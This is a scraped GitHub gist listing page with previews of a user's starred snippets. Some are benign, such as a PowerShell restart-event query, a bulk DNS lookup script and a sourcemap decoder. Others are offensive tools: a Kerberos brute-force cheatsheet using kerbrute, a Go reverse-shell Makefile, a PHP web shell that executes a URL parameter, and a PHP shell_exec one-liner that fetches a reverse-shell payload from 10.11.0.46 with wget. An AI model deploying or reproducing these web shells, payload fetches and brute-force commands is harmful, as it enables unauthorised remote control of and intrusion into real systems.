Skip to content

Instantly share code, notes, and snippets.

View kAh00t's full-sized avatar

kAh00t

4 followers · 5 following
View GitHub Profile
@jdhitsolutions
jdhitsolutions / Get-Restart.ps1
Created May 7, 2021 18:54
A PowerShell function and format file to query the event log using Get-WinEvent for restart related events.
Function Get-Restart {
[cmdletbinding()]
[outputtype("RestartEvent")]
Param(
[Parameter(Position = 0, ValueFromPipeline)]
[ValidateNotNullOrEmpty()]
[Alias("CN")]
[string]$Computername = $env:COMPUTERNAME,
[Parameter(HelpMessage = "Find restart events since this date and time.")]
[ValidateNotNullOrEmpty()]
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@jeremypruitt
jeremypruitt / CheatSheet-Pentesting.md
Last active August 19, 2025 00:10
Pentesting Cheatsheet

Reminders

Remember to log all the things!

  • Metasploit - spool /home//.msf3/logs/console.log
  • Save contents from each terminal!
  • Linux - script myoutput.txt # Type exit to stop

Setup

@chrisdavidmiles
chrisdavidmiles / bulk_dig.sh
Last active September 9, 2024 16:48
Bulk DNS Lookup bash script
#!/bin/bash
# Bulk DNS Lookup
# Generates a CSV of DNS lookups from a list of domains.
#
# File name/path of domain list:
domain_list='domains.txt' # One FQDN per line in file.
#
# IP address of the nameserver used for lookups:
ns_ip='1.1.1.1' # Is using Cloudflare's 1.1.1.1.
#
@moloch--
moloch-- / Makefile
Last active April 26, 2023 00:55
Basic cross-platform reverse shell in Go
EXE = shell
SRC = .
LDFLAGS = -ldflags="-s -w"
windows:
GOOS=windows go build -o $(EXE)_win.exe $(LDFLAGS) $(SRC)
macos:
GOOS=darwin go build -o $(EXE)_macos $(LDFLAGS) $(SRC)
@bengourley
bengourley / decode.js
Last active April 29, 2025 23:45
//
// This program reads a sourcemap from stdin
// and replaces the "mappings" property with
// human readable content. It writes the output
// to stdout.
//
// 1. install the dependencies:
// npm i concat-stream vlq
//
// 2. optional: install jq for pretty printing json
@jhaddix
jhaddix / Testing_Checklist.md
Last active September 22, 2025 03:46 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@joswr1ght
joswr1ght / easy-simple-php-webshell.php
Last active October 20, 2025 13:50
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@jimmy-ly00
jimmy-ly00 / shell.php
Created October 30, 2017 22:14
One liner actual PHP code reverse shell
If you have access to executing php (and maybe LFI to visit the .php) e.g. phpLiteAdmin, but it only accepts one line so you cannot use the pentestmonkey php-reverse-shell.php
1. Use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet in place of the one liner
<?php echo shell_exec("[INSERT ONE LINER");?>
2. Guess programs on machine and use LFI to visit file
<?php echo shell_exec("/usr/local/bin/wget http://10.11.0.46:8000/php-reverse-shell.php -O /var/tmp/shell.php 2>&1");?>
@rsperl
rsperl / nmap_examples.md
Last active May 21, 2025 03:30
nmap examples #snippet